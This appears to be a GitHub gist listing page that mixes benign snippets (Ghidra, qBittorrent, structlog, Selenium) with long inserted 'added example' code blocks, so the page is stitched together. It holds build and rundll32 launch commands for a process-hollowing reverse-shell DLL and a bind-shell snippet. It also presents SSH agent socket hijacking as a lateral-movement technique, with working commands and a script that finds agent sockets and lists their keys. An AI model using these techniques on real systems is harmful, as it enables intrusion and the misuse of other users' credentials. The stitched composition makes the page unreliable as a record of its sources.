👽
planet rider

Philip 11philip22
  • /dev/chaos
@FrankSpierings
FrankSpierings / func-params.py
Created February 3, 2020 19:20
Ghidra Script - Example of showing function call parameters within a function using the decompiler.
#Example of showing function call parameters within a function using the decompiler.
#@author Frank Spierings
#@category
#@keybinding
#@menupath
#@toolbar
import ghidra.app.decompiler.DecompInterface as DecompInterface
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup
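The preview above stops at the imports. As an added example (my own script, not Frank Spierings' gist), the following Ghidra Jython script prints every call made inside the function under the cursor together with the arguments the decompiler bound to it. Instead of walking the ClangTokenGroup C-token tree, it reads the decompiler's high p-code, where each CALL op carries the call target as input 0 and the recovered parameters as the remaining inputs; that is the quickest way to triage things like the destination and length passed to a `memcpy` or `strcpy` across a binary. The `describe_varnode`/`collect_calls` helpers only depend on the Varnode/PcodeOp/HighFunction method names, so they can be exercised outside Ghidra with stand-in objects; `run()` is the part that needs the Ghidra-injected globals (`currentProgram`, `currentAddress`, `monitor`, `getFunctionContaining`).

```python
# Added example (not Frank Spierings' script): list the calls inside the
# current function with the decompiler's recovered arguments, via high p-code.
#@category Examples
#@keybinding
#@menupath
#@toolbar


def describe_varnode(varnode):
    """Render a p-code varnode roughly as the decompiler view shows it."""
    high = varnode.getHigh()                 # HighVariable, may be None
    if high is not None and high.getName() is not None:
        return high.getName()                # e.g. "param_1", "local_48"
    if varnode.isConstant():
        return "0x%x" % varnode.getOffset()  # immediate argument
    return str(varnode.getAddress())         # register/stack location


def collect_calls(high_func, resolve_name):
    """Return [(callee_name, [arg, ...])] for every CALL in a HighFunction.

    resolve_name(address) maps a call target to a function name or None;
    unresolved targets fall back to Ghidra's FUN_<address> convention.
    CALLIND (indirect) ops are skipped because their target is a varnode,
    not an address.
    """
    calls = []
    for op in high_func.getPcodeOps():
        if op.getMnemonic() != "CALL":
            continue
        inputs = list(op.getInputs())
        target = inputs[0].getAddress()
        name = resolve_name(target) or "FUN_%s" % target
        calls.append((name, [describe_varnode(v) for v in inputs[1:]]))
    return calls


def run():
    # currentProgram, currentAddress, monitor and getFunctionContaining are
    # injected by Ghidra into the script's globals.
    from ghidra.app.decompiler import DecompInterface
    func = getFunctionContaining(currentAddress)
    if func is None:
        print("Place the cursor inside a function first")
        return
    iface = DecompInterface()
    iface.openProgram(currentProgram)
    try:
        results = iface.decompileFunction(func, 60, monitor)
        if not results.decompileCompleted():
            print("Decompilation failed: %s" % results.getErrorMessage())
            return
        fm = currentProgram.getFunctionManager()

        def resolve(addr):
            f = fm.getFunctionAt(addr)
            return f.getName() if f is not None else None

        print("Calls in %s:" % func.getName())
        for name, args in collect_calls(results.getHighFunction(), resolve):
            print("  %s(%s)" % (name, ", ".join(args)))
    finally:
        iface.dispose()


if "currentProgram" in globals():   # only when run from Ghidra's script manager
    run()
```

Drop the file into a script directory registered in the Script Manager and run it with the cursor inside a function. Arguments that the decompiler could not attach to a named variable show up as raw register or stack locations, which is usually a hint that the callee's prototype needs fixing first.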
@scragly
scragly / README.md
Last active November 14, 2020 15:24
QBittorrent WebAPI script for getting the size of all torrents.

Requires Python 3.6+

The only third-party dependency is the Requests library. Install it with: python3 -m pip install requests
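As an added example (my own code, not scragly's gist), here is the whole flow against the qBittorrent WebAPI v2 using only the standard library instead of Requests: log in with `/api/v2/auth/login` (the session lives in the `SID` cookie), fetch `/api/v2/torrents/info`, and sum the size fields. The base URL, username and password are command-line arguments; `SAMPLE_TORRENTS` is a constructed list in the shape the API returns, used to exercise the summing offline.

```python
# Added example (not scragly's gist): total size of all torrents via the
# qBittorrent WebAPI v2, standard library only.
import http.cookiejar
import json
import sys
import urllib.parse
import urllib.request

# Constructed sample in the shape /api/v2/torrents/info returns (trimmed to
# the fields used here); used for offline testing.
SAMPLE_TORRENTS = [
    {"name": "alpha.iso", "size": 1024, "total_size": 2048},
    {"name": "beta.tar", "size": 512, "total_size": 512},
    {"name": "gamma", "state": "missingFiles"},   # no size fields at all
]


def sum_torrent_sizes(torrents, field="size"):
    """Sum `field` over the torrent list.

    'size' counts only selected files; 'total_size' includes deselected ones.
    Entries missing the field or carrying a non-integer are skipped so one odd
    record cannot abort the whole run.
    """
    total = 0
    for torrent in torrents:
        value = torrent.get(field)
        if isinstance(value, int) and not isinstance(value, bool):
            total += value
    return total


def human_size(num_bytes):
    """Format a byte count with binary prefixes (1 KiB = 1024 B)."""
    size = float(num_bytes)
    for unit in ("B", "KiB", "MiB", "GiB", "TiB"):
        if size < 1024 or unit == "TiB":
            return "%.2f %s" % (size, unit)
        size /= 1024.0


class QBitClient:
    """Minimal cookie-authenticated client for the WebAPI v2."""

    def __init__(self, base_url, username, password, timeout=10):
        self.base_url = base_url.rstrip("/")
        self.timeout = timeout
        jar = http.cookiejar.CookieJar()           # holds the SID session cookie
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(jar))
        # qBittorrent's CSRF protection rejects requests whose Referer/Origin
        # does not match the WebUI address.
        self.opener.addheaders = [("Referer", self.base_url)]
        self._login(username, password)

    def _login(self, username, password):
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        with self.opener.open(self.base_url + "/api/v2/auth/login",
                              data=data, timeout=self.timeout) as resp:
            body = resp.read().decode()
        # The API answers HTTP 200 with "Ok." or "Fails." rather than a 401.
        if body.strip() != "Ok.":
            raise RuntimeError("qBittorrent login failed: %r" % body)

    def torrents(self):
        with self.opener.open(self.base_url + "/api/v2/torrents/info",
                              timeout=self.timeout) as resp:
            return json.loads(resp.read().decode())


def main(argv):
    if len(argv) != 4:
        print("usage: %s http://host:8080 username password" % argv[0])
        return 2
    client = QBitClient(argv[1], argv[2], argv[3])
    torrents = client.torrents()
    print("%d torrents, %s selected, %s total" % (
        len(torrents),
        human_size(sum_torrent_sizes(torrents, "size")),
        human_size(sum_torrent_sizes(torrents, "total_size"))))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Two things worth knowing before pointing this at a real instance: the WebUI password on the command line is visible to every other user via `ps`, so read it from an environment variable or prompt for it in anything beyond a one-off; and the `Referer` header is not optional, since qBittorrent's CSRF check refuses the login POST without a matching one.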

@11philip22
11philip22 / process-hollow-shell-dll.c
Created November 26, 2020 10:41 — forked from FrankSpierings/process-hollow-shell-dll.c
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time to enable the printf debug logging.
// Use -DNON_MS_DLL_BLOCK at compile time to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@simonw
simonw / log_to_sqlite.py
Created September 30, 2019 16:22
Class for logging structlog entries to a SQLite database
# Use it like this:
#
# structlog.configure(
# processors=[
# structlog.processors.JSONRenderer(),
# LogToSqlite("/tmp/logs.db")
# ]
# )
# log = structlog.get_logger()
# log.msg("say-hello", whom="world", num=[random.randint(1,55)])
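The preview shows only the wiring, not the class. As an added example (my own sink, not simonw's class), here is a processor that fits the configuration above: it sits after `JSONRenderer`, so it receives the rendered JSON string, stores it verbatim, and pulls the structlog `event` name into its own indexed column. Log content is attacker-influenced (usernames, paths, request headers), so every value is bound as a query parameter rather than formatted into the SQL. The `rows` helper and the `:memory:` database used in testing are assumptions of this example.

```python
# Added example (not simonw's class): a structlog processor that appends each
# rendered event to a SQLite table.
import json
import sqlite3
import time


class LogToSqlite:
    """Callable with the structlog processor signature (logger, method, event)."""

    def __init__(self, path):
        # check_same_thread=False lets the processor be shared by threads;
        # sqlite3 serialises access on the connection itself.
        self.conn = sqlite3.connect(path, check_same_thread=False)
        self.conn.execute(
            "CREATE TABLE IF NOT EXISTS logs ("
            " id INTEGER PRIMARY KEY,"
            " ts REAL NOT NULL,"
            " method TEXT NOT NULL,"
            " event TEXT,"
            " payload TEXT NOT NULL)")
        self.conn.execute("CREATE INDEX IF NOT EXISTS logs_event ON logs(event)")
        self.conn.commit()

    def __call__(self, logger, method_name, event_dict):
        # After JSONRenderer event_dict is already a str; accept a dict too.
        if isinstance(event_dict, str):
            payload = event_dict
        else:
            payload = json.dumps(event_dict, default=str)
        try:
            event = json.loads(payload).get("event")
        except (ValueError, AttributeError):
            event = None   # not a JSON object; keep the raw payload anyway
        # Log content is attacker-influenced, so every value is bound as a
        # parameter and never spliced into the SQL text.
        self.conn.execute(
            "INSERT INTO logs (ts, method, event, payload) VALUES (?, ?, ?, ?)",
            (time.time(), method_name, event, payload))
        self.conn.commit()
        return event_dict   # pass through so it can remain the last processor

    def rows(self, event=None):
        """(method, event, payload) tuples in insertion order, optionally
        restricted to one event name."""
        if event is None:
            cur = self.conn.execute(
                "SELECT method, event, payload FROM logs ORDER BY id")
        else:
            cur = self.conn.execute(
                "SELECT method, event, payload FROM logs WHERE event = ? ORDER BY id",
                (event,))
        return cur.fetchall()


# Wiring it into structlog (the library is not imported above so the sink can
# be exercised without it):
#
#   structlog.configure(processors=[
#       structlog.processors.JSONRenderer(),
#       LogToSqlite("/tmp/logs.db"),
#   ])
#   structlog.get_logger().msg("say-hello", whom="world")
```

Committing after every event is the simplest durable option; under real load you would batch inserts inside one transaction and flush on a timer, and give the database file permissions that keep other local users from reading what ends up in the logs.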
@sousatg
sousatg / TwitterBird,py
Created February 13, 2016 17:45
Twitter private API wrapper class
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, time
from lxml import etree
class TwitterHammer:
    def __init__(self, username, password):
        self.username = username
        self.password = password
@geyslan
geyslan / shell_bind_tcp.c
Last active June 7, 2022 01:30
Shell Bind TCP in C Language (Linux/x86) - forlife
// This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.c
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>
int main()
{
@FrankSpierings
FrankSpierings / process-hollow-shell-dll.c
Last active August 30, 2022 20:46
Reverse shell which uses process hollowing technique
// docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time to enable the printf debug logging.
// Use -DNON_MS_DLL_BLOCK at compile time to block injection of non-Microsoft DLLs into the host process.
// Use -DWAITFOR at compile time to wait for the host process to finish.
//
// Run:
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
// rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe
@hibariya
hibariya / Makefile
Last active November 11, 2022 10:35
Calling c function from x86 assembly code (cdecl)
OBJECTS = func.o main.o
CC = gcc
CFLAGS = -std=c11 -m32 -Wall -Wextra -Werror -c
AS = nasm
ASFLAGS = -f elf
all: $(OBJECTS)
	gcc -m32 $(OBJECTS) -o main
run: all

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld
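As an added example (my own script, not part of the gist above), the following does in Python what the two shell commands do, and then goes one step further: after enumerating candidate agent sockets the way `find /tmp/ssh-* -type s` does, it connects to each one and asks which keys it holds by speaking the ssh-agent protocol directly (one SSH_AGENTC_REQUEST_IDENTITIES message, answered by SSH_AGENT_IDENTITIES_ANSWER). That is the equivalent of `SSH_AUTH_SOCK=... ssh-add -l`, and it makes the security point concrete: the only thing needed is a socket path, and the agent will sign on your behalf without any key material ever leaving it. `SAMPLE_ANSWER` is a constructed reply used for offline testing.

```python
# Added example (not part of the original gist): find forwarded-agent sockets
# and list the identities each agent holds, using the raw agent protocol.
import glob
import os
import socket
import stat
import struct

SSH_AGENTC_REQUEST_IDENTITIES = 11   # client -> agent
SSH_AGENT_IDENTITIES_ANSWER = 12     # agent -> client
SSH_AGENT_FAILURE = 5


def ssh_string(data):
    """Encode bytes as an SSH 'string': uint32 length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def read_ssh_string(buf, offset):
    """Decode an SSH 'string' at offset; returns (bytes, new_offset)."""
    if offset + 4 > len(buf):
        raise ValueError("truncated agent message")
    (length,) = struct.unpack_from(">I", buf, offset)
    offset += 4
    if offset + length > len(buf):
        raise ValueError("truncated agent message")
    return buf[offset:offset + length], offset + length


def build_request_identities():
    """Framed SSH_AGENTC_REQUEST_IDENTITIES message (length prefix + type byte)."""
    return ssh_string(bytes([SSH_AGENTC_REQUEST_IDENTITIES]))


def parse_identities_answer(msg):
    """Parse an unframed SSH_AGENT_IDENTITIES_ANSWER into [(key_type, comment)].

    Each entry is string(key blob), string(comment); the blob itself starts
    with string(key type), e.g. "ssh-ed25519". A failure reply or a cut-off
    message raises ValueError instead of returning partial data.
    """
    if len(msg) < 5 or msg[0] != SSH_AGENT_IDENTITIES_ANSWER:
        raise ValueError("unexpected agent reply type %r" % msg[:1])
    (count,) = struct.unpack_from(">I", msg, 1)
    offset = 5
    keys = []
    for _ in range(count):
        blob, offset = read_ssh_string(msg, offset)
        comment, offset = read_ssh_string(msg, offset)
        key_type, _ = read_ssh_string(blob, 0)
        keys.append((key_type.decode("ascii", "replace"),
                     comment.decode("utf-8", "replace")))
    return keys


def find_agent_sockets(root="/tmp"):
    """Paths under root/ssh-*/agent.* that really are UNIX sockets."""
    found = []
    for path in glob.glob(os.path.join(root, "ssh-*", "agent.*")):
        try:
            if stat.S_ISSOCK(os.stat(path).st_mode):
                found.append(path)
        except OSError:
            continue   # socket vanished or directory not ours to traverse
    return sorted(found)


def _recv_exact(sock, n):
    data = b""
    while len(data) < n:
        part = sock.recv(n - len(data))
        if not part:
            raise ConnectionError("agent closed the socket")
        data += part
    return data


def list_identities(sock_path, timeout=2.0):
    """Connect to one agent socket and return its [(key_type, comment)]."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        sock.connect(sock_path)
        sock.sendall(build_request_identities())
        (length,) = struct.unpack(">I", _recv_exact(sock, 4))
        return parse_identities_answer(_recv_exact(sock, length))


# Constructed reply for offline testing: one ed25519 key (zeroed public part)
# with the comment "user@laptop".
SAMPLE_ANSWER = (bytes([SSH_AGENT_IDENTITIES_ANSWER]) + struct.pack(">I", 1)
                 + ssh_string(ssh_string(b"ssh-ed25519") + ssh_string(b"\x00" * 32))
                 + ssh_string(b"user@laptop"))


if __name__ == "__main__":
    for path in find_agent_sockets():
        try:
            keys = list_identities(path)
        except (OSError, ValueError) as exc:
            print("%s: %s" % (path, exc))
            continue
        print("%s: %d key(s)" % (path, len(keys)))
        for key_type, comment in keys:
            print("    %s %s" % (key_type, comment))
```

The defensive reading is the same as the offensive one: anyone who can connect to the socket can use every key in it, and root on the bastion always can. Prefer `ProxyJump` over `ForwardAgent yes`, keep forwarding off by default in `ssh_config`, and load keys with `ssh-add -c` so each signature needs a local confirmation.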
@anhldbk
anhldbk / Selenium.Python.InjectJS.py
Last active April 15, 2023 03:53
Inject jQuery into Selenium Driver
from selenium import webdriver
driver = webdriver.Firefox()
driver.get('https://www.facebook.com/')
with open('jquery-1.9.1.min.js', 'r') as jquery_js:
    jquery = jquery_js.read()  # read the jQuery source from a file
driver.execute_script(jquery)  # evaluate it in the page to load the library
driver.execute_script("$('#email').text('anhld')")